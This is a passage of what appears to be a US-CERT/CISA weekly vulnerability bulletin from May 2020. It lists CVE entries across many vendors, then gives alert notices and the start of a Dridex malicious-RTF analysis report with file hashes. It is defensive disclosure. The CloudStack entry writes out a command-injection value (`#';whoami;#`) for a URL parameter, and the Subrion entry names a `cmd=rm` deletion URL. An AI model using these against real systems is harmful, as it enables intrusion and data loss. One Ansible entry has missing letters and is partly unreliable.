  The SVG Sanitizer extension for TYPO3 has a cross-site scripting vulnerability in versions before 1.0.3. Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Albeit the markup is not valid it still is evaluated in browsers and leads to cross-site scripting. This is fixed in version 1.0.3. 2020-05-13 3.5 CVE-2020-11070
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.5.12 and less than 9.5.17, and greater than or equal to 10.2.0 and less than 10.4.2, it has been discovered that link tags generated by typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly. This has been fixed in 9.5.17 and 10.4.2. 2020-05-13 3.5 CVE-2020-11065
CONFIRM typo3 -- typo3
  In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, it has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2. 2020-05-13 3.5 CVE-2020-11064
CONFIRM

Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

3s-smart_software_solutions -- codesys_development_system
  An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation. 2020-05-14 not yet calculated CVE-2020-12068
MISC
MISC apache -- ant
  Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process. 2020-05-14 not yet calculated CVE-2020-1945
MISC apache -- camel
  Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11972
MLIST
MLIST
MISC apache -- camel
  Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11973
MLIST
MISC apache -- camel
  Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 is affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0. 2020-05-14 not yet calculated CVE-2020-11971
MLIST
MISC apache -- cloudstack
  A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. This applies to all versions prior to 4.13.1. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command. For example: Normal: http://{GW}:10086/baremetal/provisiondone/{mac}, Abnormal: http://{GW}:10086/baremetal/provisiondone/#';whoami;#. Mitigation of this issue is an upgrade to Apache CloudStack 4.13.1.0 or beyond. 2020-05-14 not yet calculated CVE-2019-17562
MISC apache -- flink
  A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.<reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data. 2020-05-14 not yet calculated CVE-2020-1960
MISC apache -- nuttx
  The Apache NuttX (Incubating) project provides an optional separate "apps" repository which contains various optional components and example programs. One of these, ftpd, had a NULL pointer dereference bug. The NuttX RTOS itself is not affected. Users of the optional apps repository are affected only if they have enabled ftpd. Versions 6.15 to 8.2 are affected. 2020-05-12 not yet calculated CVE-2020-1939
MISC apt -- apt
  Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files. 2020-05-15 not yet calculated CVE-2020-3810
MISC
MISC
MISC
MISC
MISC bitdefender -- bitdefender_engines
  Improper Input Validation vulnerability in the cevakrnl.rv0 module as used in the Bitdefender Engines allows an attacker to trigger a denial of service while scanning a specially-crafted sample. This issue affects: Bitdefender Bitdefender Engines versions prior to 7.84063. 2020-05-15 not yet calculated CVE-2020-8100
MISC canonical -- subiquity
  It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered. 2020-05-13 not yet calculated CVE-2020-11932
MISC cellebrite -- ufed
  Cellebrite UFED 5.0 to 7.5.0.845 implements local operating system policies that can be circumvented to obtain a command prompt via the Windows file dialog that is reachable via the Certificate-Based Authentication option of the Wireless Network Connection screen. 2020-05-15 not yet calculated CVE-2020-12798
MISC
MISC
MISC
MISC
MISC clamav -- clam_antivirus
  A vulnerability in the ARJ archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a heap buffer overflow read. An attacker could exploit this vulnerability by sending a crafted ARJ file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition. 2020-05-13 not yet calculated CVE-2020-3327
CISCO clamav -- clam_antivirus
  A vulnerability in the PDF archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.101 - 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a stack buffer overflow read. An attacker could exploit this vulnerability by sending a crafted PDF file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition. 2020-05-13 not yet calculated CVE-2020-3341
CISCO d-link -- dap-1360_devices
  An issue was discovered on D-Link DAP-1360 revision F devices. Remote attackers can start a telnet service without authorization via an undocumented HTTP request. Although this is the primary vulnerability, the impact depends on the firmware version. Versions 609EU through 613EUbeta were tested. Versions through 6.12b01 have weak root credentials, allowing an attacker to gain remote root access. After 6.12b01, the root credentials were changed but the telnet service can still be started without authorization. 2020-05-15 not yet calculated CVE-2019-18666
MISC
MISC
MISC eq-3 -- homematic_ccu2_and_ccu3_devices
  eQ-3 Homematic Central Control Unit (CCU)2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in the JSON API Method ReGa.runScript, by unauthenticated attackers with access to the web interface, due to the default auto-login feature being enabled during first-time setup (or factory reset). 2020-05-15 not yet calculated CVE-2020-12834
MISC estsoft -- alsong
  ALSong 3.46 and earlier version contain a Document Object Model (DOM) based cross-site scripting vulnerability caused by improper validation of user input. A remote attacker could exploit this vulnerability by tricking the victim to open ALSong Album(sab) file. 2020-05-15 not yet calculated CVE-2020-7809
MISC
MISC f5 -- nginx
  NGINX through 1.18.0 allows an HTTP request smuggling attack that can lead to cache poisoning, credential hijacking, or security bypass. 2020-05-14 not yet calculated CVE-2020-12440
MISC
MISC fazecast -- jserialcomm
  In Fazecast jSerialComm, Version 2.2.2 and prior, an uncontrolled search path element vulnerability could allow a malicious DLL file with the same name of any resident DLLs inside the software installation to execute arbitrary code. 2020-05-14 not yet calculated CVE-2020-10626
MISC freerdp -- freerdp
  libfreerdp/cache/bitmap.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out of bounds read. 2020-05-15 not yet calculated CVE-2020-11525
MISC
CONFIRM
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/codec/planar.c in FreeRDP version > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 not yet calculated CVE-2020-11521
MISC
CONFIRM
CONFIRM google -- android
  In mnld, an incorrect configuration in driver_cfg of mnld for meta factory mode. Product: Android. Versions: Android SoC. Android ID: A-149808700. 2020-05-14 not yet calculated CVE-2020-0091
MISC google -- android
  An improper authorization in the receiver component of the Android Suite Daemon. Product: Android. Versions: Android SoC. Android ID: A-149813448. 2020-05-14 not yet calculated CVE-2020-0065
MISC google -- android
  In setImageHeight and setImageWidth of ExifUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9 Android-10. Android ID: A-148223871. 2020-05-14 not yet calculated CVE-2020-0094
MISC google -- android
  An improper authorization while processing the provisioning data.Product: AndroidVersions: Android SoCAndroid ID: A-149866855 2020-05-14 not yet calculated CVE-2020-0064
MISC google -- android
  An improper authorization in the receiver component of Email.Product: AndroidVersions: Android SoCAndroid ID: A-149813048 2020-05-14 not yet calculated CVE-2020-0090
MISC google -- android
  In onCreate of SettingsBaseActivity.java, there is a possible unauthorized setting modification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-8.0Android ID: A-137015265 2020-05-14 not yet calculated CVE-2020-0024
MISC google -- android
  In various methods of PackageManagerService.java, there is a possible permission bypass due to a missing condition for system apps. This could lead to local escalation of privilege with User privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-145981139 2020-05-14 not yet calculated CVE-2020-0097
MISC google -- android
  In exif_data_save_data_entry of exif-data.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-148705132 2020-05-14 not yet calculated CVE-2020-0093
MLIST
MISC google -- android
  In onTransact of IHDCP.cpp, there is a possible out of bounds read due to incorrect error handling. This could lead to local information disclosure of data from a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-8.0Android ID: A-150156584 2020-05-14 not yet calculated CVE-2020-0100
MISC google -- android
  In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-145669109 2020-05-14 not yet calculated CVE-2020-0096
MISC google -- android
  In setHideSensitive of NotificationStackScrollLayout.java, there is a possible disclosure of sensitive notification content due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145135488 2020-05-14 not yet calculated CVE-2020-0092
MISC
huawei -- multiple_devices
  Huawei smartphones Honor View 20; Honor 20; Honor 20 PRO; Honor Magic2 with versions earlier than 10.0.0.179(C636E3R4P3), versions earlier than 10.0.0.180(C185E3R3P3), versions earlier than 10.0.0.180(C432E10R3P4), versions earlier than 10.0.0.188(C00E62R2P11); versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.176(C00E60R2P11) have an out-of-bounds read vulnerability. The software reads data past the end of the intended buffer. If an attacker tricks the user into installing a crafted application, a successful exploit may cause information disclosure or abnormal service. 2020-05-15 not yet calculated CVE-2020-1808
MISC
huawei -- p20_smartphones
  Huawei P20 smartphones with versions earlier than 10.0.0.156(C00E156R1P4) have an improper authentication vulnerability. The vulnerability occurs because, when a user performs certain operations, the software insufficiently validates the user's identity. Attackers need physical access to the smartphone to exploit this vulnerability. A successful exploit could allow the attacker to bypass the limits of the student mode function. 2020-05-15 not yet calculated CVE-2020-9073
MISC
ignite_realtime -- spark
  An issue was discovered in Ignite Realtime Spark 2.8.3 (and the ROAR plugin for it) on Windows. A chat message can include an IMG element with a SRC attribute referencing an external host's IP address. Upon access to this external host, the (NT)LM hashes of the user are sent with the HTTP request. This allows an attacker to collect these hashes, crack them, and potentially compromise the computer. (ROAR can be configured for automatic access. Also, access can occur if the user clicks.) 2020-05-12 not yet calculated CVE-2020-12772
MISC
intelliants -- subrion_cms
  A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion CMS 4.2.1 that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim. 2020-05-15 not yet calculated CVE-2019-20390
MISC
intelliants -- subrion_cms
  An XSS issue was identified on the Subrion CMS 4.2.1 /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding. 2020-05-15 not yet calculated CVE-2019-20389
MISC
interchange -- interchange
  XSS in the admin help system admin/help.html and admin/quicklinks.html in Interchange 4.7.0 through 5.11.x allows remote attackers to steal credentials or data via browser JavaScript. 2020-05-15 not yet calculated CVE-2020-12685
MISC
CONFIRM
jal_information_technology -- pallet_control
  Improper Access Control in PALLET CONTROL Ver. 6.3 and earlier allows authenticated attackers to execute arbitrary code with the SYSTEM privilege on the computer where PALLET CONTROL is installed via unspecified vectors. PalletControl 7 to 9.1 are not affected by this vulnerability, however under the environment where PLS Management Add-on Module is used, all versions are affected. 2020-05-11 not yet calculated CVE-2020-5538
MISC
MISC
jetstream -- jetselect
  The administrative passwords for all versions of Bond JetSelect are stored within an unprotected file on the filesystem, rather than encrypted within the MySQL database. This backup copy of the passwords is made as part of the installation script, after the administrator has generated a password using ENCtool.jar (see CVE-2019-13022). This allows any low-privilege user who can read this file to trivially obtain the passwords for the administrative accounts of the JetSelect application. The path to the file containing the encoded password hash is /opt/JetSelect/SFC/resources/sfc-general-properties. 2020-05-14 not yet calculated CVE-2019-13021
MISC
jetstream -- jetselect
  Bond JetSelect (all versions) has an issue in the Java class (ENCtool.jar) and corresponding password generation algorithm (used to set initial passwords upon first installation). It XORs the plaintext into the 'encrypted' password that is then stored within the database. These steps are able to be trivially reversed, allowing for escalation of privilege within the JetSelect application through obtaining the passwords of JetSelect administrators. JetSelect administrators have the ability to modify and delete all networking configuration across a vessel, as well as altering network configuration of all managed network devices (switches, routers). 2020-05-14 not yet calculated CVE-2019-13022
MISC
jetstream -- jetselect
  An issue was discovered in all versions of Bond JetSelect. Within the JetSelect Application, the web interface hides RADIUS secrets, WPA passwords, and SNMP strings from 'non administrative' users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible. 2020-05-14 not yet calculated CVE-2019-13023
MISC
kerberos -- kerberos
  The kerberos package before 1.0.0 for Node.js allows arbitrary code execution and privilege escalation via injection of malicious DLLs through use of the kerberos_sspi LoadLibrary() method, because of a DLL path search. 2020-05-16 not yet calculated CVE-2020-13110
MISC
MISC
MISC
MISC
linux -- linux_kernel
  The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space. 2020-05-15 not yet calculated CVE-2020-12888
MISC
MISC
logkitty -- logkitty
  Lack of output sanitization allowed an attacker to execute arbitrary shell commands via the logkitty npm package before version 0.7.1. 2020-05-15 not yet calculated CVE-2020-8149
MISC
mikrotik -- mikrotik-router-monitoring-system
  An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community. 2020-05-16 not yet calculated CVE-2020-13118
MISC
misp -- misp-maltego
  MISP MISP-maltego 1.4.4 incorrectly shares a MISP connection across users in a remote-transform use case. 2020-05-15 not yet calculated CVE-2020-12889
MISC
mongodb -- mongodb
  In affected Ops Manager versions there is an exposed http route that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5. 2020-05-13 not yet calculated CVE-2019-2388
MISC
morita -- shogi
  Morita Shogi 64 through 2020-05-02 for Nintendo 64 devices allows remote attackers to execute arbitrary code via crafted packet data to the built-in modem because 0x800b3e94 (aka the IF subcommand to top-level command 7) has a stack-based buffer overflow. 2020-05-16 not yet calculated CVE-2020-13109
MISC
MISC
naviserver -- naviserver
  NaviServer 4.99.4 to 4.99.19 allows denial of service due to the nsd/driver.c ChunkedDecode function not properly validating the length of a chunk. A remote attacker can craft a chunked-transfer request that will result in a negative value being passed to memmove via the size parameter, causing the process to crash. 2020-05-16 not yet calculated CVE-2020-13111
MISC
MISC
opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC communication does not include any credentials. This allows an attacker with network access to directly communicate with SoftPAC, including, for example, stopping the service remotely. 2020-05-14 not yet calculated CVE-2020-10620
MISC
palo_alto_networks -- global_protect_agent
  An open redirection vulnerability in the GlobalProtect component of Palo Alto Networks PAN-OS allows an attacker to specify an arbitrary redirection target away from the trusted GlobalProtect gateway. If the user then successfully authenticates it will cause them to access an unexpected and potentially malicious website. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.0 versions earlier than 8.0.14. 2020-05-13 not yet calculated CVE-2020-1997
CONFIRM
palo_alto_networks -- pan-os
  A predictable temporary file vulnerability in PAN-OS allows a local authenticated user with shell access to corrupt arbitrary system files affecting the integrity of the system. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 not yet calculated CVE-2020-1994
CONFIRM
palo_alto_networks -- pan-os
  A missing authorization vulnerability in the management server component of PAN-OS Panorama allows a remote unauthenticated user to inject messages into the management server ms.log file. This vulnerability can be leveraged to obfuscate an ongoing attack or fabricate log entries in the ms.log file. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.9. 2020-05-13 not yet calculated CVE-2020-1996
CONFIRM
palo_alto_networks -- pan-os
  An improper authorization vulnerability in PAN-OS mistakenly uses the permissions of local Linux users instead of the intended SAML permissions of the account when the username is shared for the purposes of SSO authentication. This can result in authentication bypass and unintended resource access for the user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0. 2020-05-13 not yet calculated CVE-2020-1998
CONFIRM
palo_alto_networks -- pan-os
  An authentication bypass by spoofing vulnerability exists in the authentication daemon and User-ID components of Palo Alto Networks PAN-OS because they fail to verify the integrity of the Kerberos key distribution center (KDC) before authenticating users. This affects all forms of authentication that use a Kerberos authentication profile. A man-in-the-middle attacker with the ability to intercept communication between PAN-OS and the KDC can log in to PAN-OS as an administrator. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0. 2020-05-13 not yet calculated CVE-2020-2002
CONFIRM
palo_alto_networks -- pan-os
  A cleartext transmission of sensitive information vulnerability in Palo Alto Networks PAN-OS Panorama discloses an authenticated PAN-OS administrator's PAN-OS session cookie. When an administrator issues a context switch request into a managed firewall with an affected PAN-OS Panorama version, their PAN-OS session cookie is transmitted in cleartext to the firewall. An attacker with the ability to intercept this network traffic between the firewall and Panorama can access the administrator's account and further manipulate devices managed by Panorama. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0. 2020-05-13 not yet calculated CVE-2020-2013
CONFIRM
pandas -- pandas
  pandas through 1.0.3 can unserialize and execute commands from an untrusted file that is passed to the read_pickle() function, if __reduce__ makes an os.system call. 2020-05-15 not yet calculated CVE-2020-13091
MISC
progress -- moveit_automation_web_admin
  An issue was discovered in Progress MOVEit Automation Web Admin. A Web Admin application endpoint failed to adequately sanitize malicious input, which could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS. This affects 2018 - 2018.0 prior to 2018.0.3, 2018 SP1 - 2018.2 prior to 2018.2.3, 2018 SP2 - 2018.3 prior to 2018.3.7, 2019 - 2019.0 prior to 2019.0.3, 2019.1 - 2019.1 prior to 2019.1.2, and 2019.2 - 2019.2 prior to 2019.2.2. 2020-05-14 not yet calculated CVE-2020-12677
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
pulseaudio -- pulseaudio
  An Ubuntu-specific modification to Pulseaudio to provide security mediation for Snap-packaged applications was found to have a bypass of intended access restriction for snaps which plugs any of pulseaudio, audio-playback or audio-record via unloading the pulseaudio snap policy module. This issue affects: pulseaudio 1:8.0 versions prior to 1:8.0-0ubuntu3.12; 1:11.1 versions prior to 1:11.1-1ubuntu7.7; 1:13.0 versions prior to 1:13.0-1ubuntu1.2; 1:13.99.1 versions prior to 1:13.99.1-1ubuntu3.2; 2020-05-15 not yet calculated CVE-2020-11931
MISC
red_hat -- ansible_engine
  An incomplete fix was found for the fix of the flaw CVE-2020-1733 ansible: insecure temporary directory when running become_user from become directive. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous versions are affected and Ansible Tower 3.4.5, 3.5.6 and 3.6.4 as well as previous versions are affected. 2020-05-15 not yet calculated CVE-2020-10744
CONFIRM
red_hat -- ansible_engine
  A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble. 2020-05-11 not yet calculated CVE-2020-10685
CONFIRM
CONFIRM
red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack. 2020-05-15 not yet calculated CVE-2020-1758
CONFIRM
MISC
sap -- business_client
  SAP Business Client, version 7.0, allows an attacker after a successful social engineering attack to inject malicious code as a DLL file in untrusted directories that can be executed by the application, due to uncontrolled search path element. An attacker could thereby control the behavior of the application. 2020-05-12 not yet calculated CVE-2020-6244
MISC
MISC
scikit-learn -- scikit-learn
  scikit-learn (aka sklearn) through 0.23.0 can unserialize and execute commands from an untrusted file that is passed to the joblib.load() function, if __reduce__ makes an os.system call. 2020-05-15 not yet calculated CVE-2020-13092
MISC
securecrt -- securecrt
  SecureCRT before 8.7.2 allows remote attackers to execute arbitrary code via an Integer Overflow and a Buffer Overflow because a banner can trigger a line number to CSI functions that exceeds INT_MAX. 2020-05-15 not yet calculated CVE-2020-12651
MISC
MISC
CONFIRM
MISC
slpjs -- slpjs
  In SLP Validate (npm package slp-validate) before version 1.2.1, users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This has been fixed in slp-validate in version 1.2.1. Additionally, slpjs version 0.27.2 has a related fix under related CVE-2020-11071. 2020-05-12 not yet calculated CVE-2020-11072
MISC
CONFIRM
slpjs -- slpjs
  SLPJS (npm package slpjs) before version 0.27.2, has a vulnerability where users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This is fixed in version 0.27.2. 2020-05-12 not yet calculated CVE-2020-11071
MISC
CONFIRM
submitty -- submitty
  Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. 2020-05-15 not yet calculated CVE-2020-12882
MISC
submitty -- sumbitty
  Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. 2020-05-16 not yet calculated CVE-2020-13121
MISC
videolan -- vlc_media_player
  An off-by-one error in the DecodeBlock function in codec/sdl_image.c in VideoLAN VLC media player before 3.0.9 allows remote attackers to cause a denial of service (memory corruption) via a crafted image file. NOTE: this may be related to the SDL_Image product. 2020-05-15 not yet calculated CVE-2019-19721
MISC
MISC
MISC
MISC
vmware -- spring_security
  Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack. 2020-05-14 not yet calculated CVE-2020-5408
CONFIRM
wordpress -- wordpress
  The iubenda-cookie-law-solution plugin before 2.3.5 for WordPress does not restrict URL sanitization to http protocols. 2020-05-13 not yet calculated CVE-2020-12742
MISC
MISC
xwiki -- platform
  In XWiki Platform 7.2 through 11.10.2, registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards. This has been fixed in 11.3.7, 11.10.3 and 12.0. 2020-05-12 not yet calculated CVE-2020-11057
CONFIRM
MISC
MISC
yaws -- yaws
  yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks. 2020-05-15 not yet calculated CVE-2020-12872
MISC
MISC
MISC
MISC
zephyrproject -- zephyr
  USB DFU has a potential buffer overflow where the requested length (wLength) is not checked against the buffer size. This could be used by a malicious USB host to exploit the buffer overflow. See NCC-ZEP-002. This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions; version 2.1.0 and later versions. 2020-05-11 not yet calculated CVE-2020-10019
MISC
MISC
MISC
MISC
MISC
zhejiang_dahua_technology -- multiple_devices
  Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method. 2020-05-13 not yet calculated CVE-2019-9682
MISC
zhejiang_dahua_technology -- multiple_products
  Some Dahua products with Build time before December 2019 have predictable Session ID vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device. 2020-05-13 not yet calculated CVE-2020-9502
MISC
zhejiang_dahua_technology -- web_p2p
  Attackers can obtain Cloud Key information from the Dahua Web P2P control in specific ways. Cloud Key is used to authenticate the connection between the client tool and the platform. An attacker may use the leaked Cloud Key to impersonate the client to connect to the platform, resulting in additional consumption of platform server resources. Versions with Build time before April 2020 are affected. 2020-05-13 not yet calculated CVE-2020-9501
MISC
zoho -- manageengine_servicedesk_plus
  Default installations of Zoho ManageEngine ServiceDesk Plus 10.0 before 10500 are vulnerable to XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute code on the Manage Engine ServiceDesk administrator side. At "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names in the Software column. In this field, a remote attacker can inject malicious code in order to execute it when the ManageEngine administrator visualizes this page. 2020-05-14 not yet calculated CVE-2019-15083
MISC
MISC
MISC
MISC

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

CISA-FBI Joint Announcement on PRC Targeting of COVID-19 Research Organizations

US-CERT All NCAS Products - Wed, 05/13/2020 - 14:12
Original release date: May 13, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have jointly released a Public Service Announcement on the People’s Republic of China’s targeting of COVID-19 research organizations. CISA and FBI encourage COVID-19 research organizations to review and apply the announcement’s recommended mitigations to prevent surreptitious review or theft of COVID-19-related material.  

For more information on Chinese malicious cyber activity, see https://www.us-cert.gov/china.

 

Microsoft Releases May 2020 Security Updates

US-CERT All NCAS Products - Tue, 05/12/2020 - 21:22
Original release date: May 12, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s May 2020 Security Update Summary and Deployment Information and apply the necessary updates.

Adobe Releases Security Updates

US-CERT All NCAS Products - Tue, 05/12/2020 - 17:04
Original release date: May 12, 2020

Adobe has released security updates to address vulnerabilities affecting Adobe DNG Software Development Kit, Acrobat, and Reader. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletin APSB20-24 and APSB20-26 and apply the necessary updates.

MIFR-10121050-1.v2

US-CERT All NCAS Products - Tue, 05/12/2020 - 16:26
Original release date: May 12, 2020
  Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary Description

This report contains information obtained from automated analysis and is not intended to be a complete description of the submitted sample. Results may be limited due to the complexity of the samples, or due to the ability of the samples to defend against automated analysis techniques. If additional information is required, please contact the Cybersecurity and Infrastructure Security Agency (CISA) using the information provided at the end of this report.

US-CERT received two malicious RTF documents. When opened, the documents attempt to download a malicious payload associated with the Dridex banking trojan.

For a downloadable copy of IOCs, see MIFR-10121050-1.v2.stix.

Files (2)

7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c (7f2a499891a72b9f3b0923be0f9db4...)

c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629 (c98f34e4e87f041c3f19749bbb995b...)

Domains (2)

